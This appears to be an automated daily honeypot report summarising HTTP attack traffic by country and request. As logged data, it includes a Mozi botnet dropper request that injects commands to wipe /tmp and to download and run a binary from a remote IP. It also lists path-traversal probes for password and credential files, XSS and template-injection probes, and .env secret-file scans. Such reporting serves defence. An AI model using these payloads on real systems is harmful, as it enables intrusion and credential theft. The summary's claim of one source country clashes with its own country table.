Report: 2025-06-05

Author
Shoggoth Industries

Daily Report: 2025-06-05

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 47 new requests that have never been observed before (these were added to the monitored request database).

A total of 6611 requests were recorded during the day, originating from 1 different countries, with a peak of 5484 requests coming from GB.

ot_simplified_report

Simplified report of medium-level interactions with honeypots that mimic industrial systems (website loading or interactions with the website). For more information, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| US | Dubai |
| US | Dubai |
| US | Israel |

botnet_dropper_behaviour

| remote_addr | request |
| --- | --- |
| 117.200.201.56 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.200.201.56:57955/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |

request

The requests listed here are those that have not yet been integrated into the request database.

|  | number_of_occurence | request |
| --- | --- | --- |
| 263 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/php.ini HTTP/1.1 |
| 310 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1 |
| 575 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Csystem32\x5Cconfig\x5CSAM HTTP/1.1 |
| 883 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fvar/log/nginx/access.log HTTP/1.1 |
| 900 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/hostname HTTP/1.1 |
| 948 | 2 | GET /api/teams/1/members HTTP/1.1 |
| 1024 | 2 | GET /cgi-bin/luci/ HTTP/1.1 |
| 1037 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1 |
| 1107 | 2 | GET /template?code={{ self }} HTTP/1.1 |
| 1615 | 2 | GET /ws-broker?action=PATCH&target=/users/1/settings HTTP/1.1 |
| 1698 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/hosts HTTP/1.1 |
| 1775 | 2 | GET /.idea/workspace.xml HTTP/1.1 |
| 1871 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2froot/.bash_history HTTP/1.1 |
| 2389 | 2 | GET /track?referrer=javascript:alert(document.domain) HTTP/1.1 |
| 2393 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fetc/shadow HTTP/1.1 |
| 2569 | 2 | GET /..%2f..%2f..%2f..%2f..%2f..%2fproc/self/environ HTTP/1.1 |
| 2609 | 2 | GET /test/template HTTP/1.1 |
| 2781 | 2 | GET /../../boot.ini HTTP/1.1 |
| 2804 | 2 | GET /jwt-decode HTTP/1.1 |
| 2847 | 1 | GET /.env.bak.2 HTTP/1.1 |
| 2878 | 1 | GET /.env-snapshot.tar.gz HTTP/1.1 |
| 2892 | 1 | GET /.env-db-credentials HTTP/1.1 |
| 2895 | 1 | GET /.env-docker HTTP/1.1 |
| 2896 | 1 | GET /.env-nginx HTTP/1.1 |
| 2897 | 1 | GET /.env-aws.env HTTP/1.1 |
| 2898 | 1 | GET /.env_cookie-settings HTTP/1.1 |
| 2899 | 1 | GET /.env-status HTTP/1.1 |
| 2900 | 1 | GET /.env-staging-vars HTTP/1.1 |
| 2901 | 1 | GET /.env-runner HTTP/1.1 |
| 2903 | 1 | GET /.env-reverse-proxy HTTP/1.1 |
| 2904 | 1 | GET /.env.job HTTP/1.1 |
| 2905 | 1 | GET /.env-copy HTTP/1.1 |
| 2920 | 1 | GET /assets/js/config.js HTTP/1.1 |
| 2923 | 1 | GET /js/env.js HTTP/1.1 |
| 2924 | 1 | GET /static/env.js HTTP/1.1 |
| 2933 | 1 | GET /api/admin HTTP/1.1 |
| 2934 | 1 | GET /api/dev HTTP/1.1 |
| 2948 | 1 | GET /.git/refs HTTP/1.1 |
| 2955 | 1 | GET /.env-tracking.log HTTP/1.1 |
| 2969 | 1 | GET /.env_secrets HTTP/1.1 |
| 2970 | 1 | GET /.env_auth HTTP/1.1 |
| 2971 | 1 | GET /.env_config HTTP/1.1 |
| 2984 | 1 | GET /config/configuration.yml HTTP/1.1 |
| 2985 | 1 | GET /config/databases.yml HTTP/1.1 |
| 2987 | 1 | GET /_fragment?_path=what=-1&_controller=phpinfo&_hash=PJKZTykFk9HjPoH4H6ZxRbyJs0b5lS70K1bzuuO1Lg4= HTTP/1.1 |
| 2988 | 1 | GET /mailer.ini HTTP/1.1 |
| 2995 | 1 | GET /ALFA_DATA/alfacgiapi HTTP/1.1 |

country_iso_code

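|  | number_of_occurence | country_iso_code |
| --- | --- | --- |
| 0 | 5484 | GB |
| 1 | 477 | US |
| 2 | 221 | BG |
| 3 | 64 | DE |
| 4 | 58 | JP |
| 5 | 46 | NL |
| 6 | 38 | CA |
| 7 | 33 | CN |
| 8 | 21 | SC |
| 9 | 21 | NG |
| 10 | 20 | HK |
| 11 | 18 | PL |
| 12 | 13 | GH |
| 13 | 12 | IN |
| 14 | 9 | KR |
| 15 | 7 | PT |
| 16 | 7 | VN |
| 17 | 7 | AO |
| 18 | 5 | FR |
| 19 | 5 | SG |
| 20 | 5 | RU |
| 21 | 4 | CH |
| 22 | 4 | IL |
| 23 | 4 | UA |
| 24 | 3 | ID |
| 25 | 3 | ES |
| 26 | 3 | TW |
| 27 | 3 | KZ |
| 28 | 2 | IT |
| 29 | 2 | BR |
| 30 | 2 | LT |
| 31 | 2 | BE |
| 32 | 2 | TH |
| 33 | 2 | BO |
| 34 | 1 | PA |
| 35 | 1 | SE |
| 36 | 1 | AR |
| 37 | 1 | IE |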
